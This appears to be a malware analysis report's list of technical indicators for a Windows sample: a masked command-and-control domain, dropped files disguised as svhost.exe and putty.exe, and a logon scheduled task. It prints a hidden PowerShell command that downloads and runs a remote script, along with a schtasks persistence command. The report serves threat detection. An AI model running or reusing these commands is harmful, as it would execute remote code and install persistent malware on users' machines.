Technical Information
- <SYSTEM32>\tasks\startupwin
- http://u5#######y.ha003.t.justns.ru/mon-module.txt
- %PROGRAMDATA%\svhost.exe
- %PROGRAMDATA%\putty.exe
- http://u5#######y.ha003.t.justns.ru/mon-module.txt
- http://u5#######y.ha003.t.justns.ru/putty.exe
- DNS ASK u5#######y.ha003.t.justns.ru
- '%PROGRAMDATA%\svhost.exe'
- '%PROGRAMDATA%\putty.exe'
- '%PROGRAMDATA%\svhost.exe' ' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell (iex(New-Object Net.WebClient).DownloadString('http://u5#######y.ha003.t.justns.ru/mon-module.txt'));' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell (iex(New-Object Net.WebClient).DownloadString('http://u5#######y.ha003.t.justns.ru/mon-module.txt'));
- '%WINDIR%\syswow64\schtasks.exe' /create /tn StartupWin /sc ONLOGON /tr %PROGRAMDATA%\svhost.exe